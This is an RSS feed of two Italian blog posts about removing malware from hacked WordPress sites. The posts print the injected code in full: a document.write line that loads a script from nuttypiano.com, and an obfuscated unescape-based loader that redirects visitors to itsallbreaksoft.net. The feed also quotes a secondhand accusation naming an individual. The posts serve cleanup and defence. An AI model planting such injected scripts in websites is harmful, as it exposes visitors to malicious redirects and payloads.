<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>BASIC TRADING MULTIMEDIA &#187; virus</title>
	<atom:link href="http://www.basictrading.biz/tag/virus/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.basictrading.biz</link>
	<description>Information Technology and Design</description>
	<lastBuildDate>Wed, 08 Feb 2012 15:33:09 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>[resolved] WordPress: javascript injection</title>
		<link>http://www.basictrading.biz/2010/09/resolved-wordpress-javascript-injection/</link>
		<comments>http://www.basictrading.biz/2010/09/resolved-wordpress-javascript-injection/#comments</comments>
		<pubDate>Mon, 13 Sep 2010 14:20:21 +0000</pubDate>
		<dc:creator>Matteo Papadopoulos</dc:creator>
				<category><![CDATA[How-to]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.basictrading.biz/?p=336</guid>
		<description><![CDATA[Ecco l&#8217;ennesimo attacco subito ad uno dei miei blog WORDPRESS&#8230; ne ho visti diversi in questo periodo ma sempre si erano limitati a scrivere una riga di codice nel file index.php del tema di wordpress. Qusta volta sono stati ben &#8230; <a href="http://www.basictrading.biz/2010/09/resolved-wordpress-javascript-injection/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Ecco l&#8217;ennesimo attacco subito ad uno dei miei blog WORDPRESS&#8230; ne ho visti diversi in questo periodo ma sempre si erano limitati a scrivere una riga di codice nel file index.php del tema di wordpress. Qusta volta sono stati ben più insedianti: tutti i file javascript sul server sono stati modificati ed è stata aggiunta alla fine di ognuno di essi una riga:</p>
<pre>document.write('&lt;sc'+'ript type="text/javascript" src="http://nuttypiano.com/Y2K.js"&gt;&lt;/scri'+'pt&gt;')
</pre>
<p>Come rimuoverlo?!</p>
<p><span id="more-336"></span>Ho quindi scoperto ed utilizzao il comando &#8220;<a href="http://en.wikipedia.org/wiki/Sed" target="_blank">sed</a>&#8221; che permette (oltre a un milione di altre cose!) di fare un find/replace sui documenti o, ancora meglio nel mio caso, eliminare una riga da un file.</p>
<p>Ho quindi eseguito un find su tutti i file .js; se il file contiene la stringa &#8220;nuttypiano&#8221; elimina tutta la riga.</p>
<pre>find -name \*.js -exec sed --in-place=bak '/nuttypiano/d' {} \;
</pre>
<p>L&#8217;opzione &#8220;&#8211;in-place=bak&#8221; crea un file di backup del file modificato al fine di evitare eventuali danni irreparabili! il file modificato si troverà nella medesima directory dell&#8217;originale trasformato da &#8220;miofile.js&#8221; a &#8220;miofile.jsbak&#8221;</p>
<p>Adesso rimane da capire come abbiano fatto ad entrare sul server&#8230; controllare i log, controllare i log&#8230;</p>
<p>Nel frattempo consiglio di modificare tutte le password e di tenere SEMPRE worpress aggiornato all&#8217;ultima versione, compresi i plugin installati.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.basictrading.biz/2010/09/resolved-wordpress-javascript-injection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Virus nel tuo blog Worpress?</title>
		<link>http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/</link>
		<comments>http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/#comments</comments>
		<pubDate>Tue, 20 Apr 2010 15:42:54 +0000</pubDate>
		<dc:creator>Matteo Papadopoulos</dc:creator>
				<category><![CDATA[Blogroll]]></category>
		<category><![CDATA[How-to]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.basictrading.biz/?p=244</guid>
		<description><![CDATA[C&#8217;è uno script, che si insidia nel tuo blog, ed è proprio un piccolo bastardello&#8230; alcuni antivirus lo riconoscono, altri no&#8230; se usi Linux o Mac, in cui facilmente non hai antivirus installati, potresti non accorgerti proprio&#8230; ma poi un &#8230; <a href="http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>C&#8217;è uno script, che si insidia nel tuo blog, ed è proprio un piccolo bastardello&#8230; alcuni antivirus lo riconoscono, altri no&#8230; se usi Linux o Mac, in cui facilmente non hai antivirus installati, potresti non accorgerti proprio&#8230; ma poi un cliente ti chiama, tu cerchi e ricerchi&#8230; e alla fine eccolo lì!</p>
<p>Però, usando firebug, capita di vedere che esiste una richiesta che parte per un sito, itsallbreaksoft.net</p>
<p><span id="more-244"></span>Bene, non si sa esattamente come questi cari signori riescano a scrivere sul file header.php del tema che avete impostato, ma li sta il danno.</p>
<p>troverete alla fine del tag &lt;/head&gt; un bello script javascript:</p>
<pre>&lt;script language=javascript&gt;document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')&lt;/script&gt;</pre>
<p>A questo punto è sufficiente cancellare lo script e assicurarsi di mettere il file header.php in sola lettura&#8230; rimane da scoprire come abiano fatto, se usano un particolare plugin falloso per accedervi o se è un bug di qualche versione di worpress. Sicurameten assicuratevi sempre di fare l&#8217;aggiornamento del vostro WP.</p>
<p><em><span><span><span style="color: black; font-size: xx-small;"><span style="font-family: arial; font-size: x-small;">It turns out  that the people behind this seem to be a pretty well-known group from  Russia, with the main person being one Sergey Ryabov, who uses the email  address director  at  climbing-games  dot  com.  <strong>[Ed. Note:  We'd  love to talk with Mr. Ryabov, to learn more about his operations and how  and why he's able to pull off this kind of hijinx.]</strong></span></span></span></span></em></p>
<p>Ringrazio<a href="http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/" target="_blank"> theinternetpatrol.com</a> per la segnalazione</p>
]]></content:encoded>
			<wfw:commentRss>http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

